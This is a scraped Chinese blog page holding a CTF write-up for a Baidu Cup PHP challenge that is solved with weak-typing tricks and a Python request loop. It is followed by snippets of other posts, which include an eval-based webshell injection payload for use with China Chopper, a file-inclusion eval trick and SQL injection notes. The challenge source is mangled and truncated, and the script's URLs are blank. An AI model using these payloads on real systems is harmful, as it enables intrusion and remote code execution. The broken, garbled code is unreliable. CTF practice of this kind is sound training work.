猥瑣百度杯猥瑣CTF

2022-03-28 17:56:13 字數 1145 閱讀 4231

其實不難,但是作為我這個**菜雞+腦洞菜雞+黑闊菜雞而言確實挺難。

題目原始碼:

<?php 

error_reporting(0);

session_start();

require('./flag.php');

if(!isset($_session['nums']))

if($_session['time']+120=10)

show_source(__file__);

?>

最主要的是那個19行的if語句。能夠讓她執行十次就可以得到flag了。

首先先看一下if後面的那個**:

其實他壓根就是為真因為我們傳如value是以陣列的形式傳入所以是不能用md5加密的。否則就是錯誤。這就是一道弱型別。所以這個不用管,因為他本身就為真。

主要是前面的

$_session['whoami']==($value[0].$value[1])
第一次傳入ea然後就可以等於第8行,但是到了21行$str_rands這個變數又將$_session['whoami']的值給覆蓋了,而$str_rands的值是通過

$str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];
隨機生成的。所以要進行一直瀏覽這個介面就可以得到flag就行了。

#

!usr/bin/env python

#!coding=utf-8

__author__ = 'zhengjim'import requests

aa = requests.session()

code = aa.get('').text

#print code

cc = code[:2]

for i in xrange(10):url = ''.format(cc[0],cc[1])

flag= aa.get(url=url).text

cc = flag[:2]

print flag

CTF之檔案包含的猥瑣思路

一 flag.php 包含flag.php這個檔案 a request hello a這個變數請求變數hello的值 if preg match w a eval var dump a 如果匹配輸出 a的值 show source file php乙個比較有意思的變數 globals 乙個包含了全部...

「百度杯」CTF比賽 九月場 Test

個人收穫 1.連線shell 失敗的時候可以試試多個版本的菜刀,可能是菜刀的問題 2.學會了菜刀資料庫管理的配置 題目介面 有現成的poc search.php?searchtype 5 tid area eval post 1 菜刀鏈結,密碼為1我們用菜刀進行訪問 之前我用另乙個菜刀無法連線,開始...

「百度杯」CTF比賽 十月場 登入

這題的sql注入也確實是讓自己漲姿勢了。自己可以說學了mysql就沒有用過like,一直以為它在sql注入裡沒用,沒想到居然可以這樣。進入環境,是乙個登入頁面。嘗試進行sql注入,發現username為admin or 1 1 的時候顯示密碼錯誤,username為admin or 1 2 的時候顯...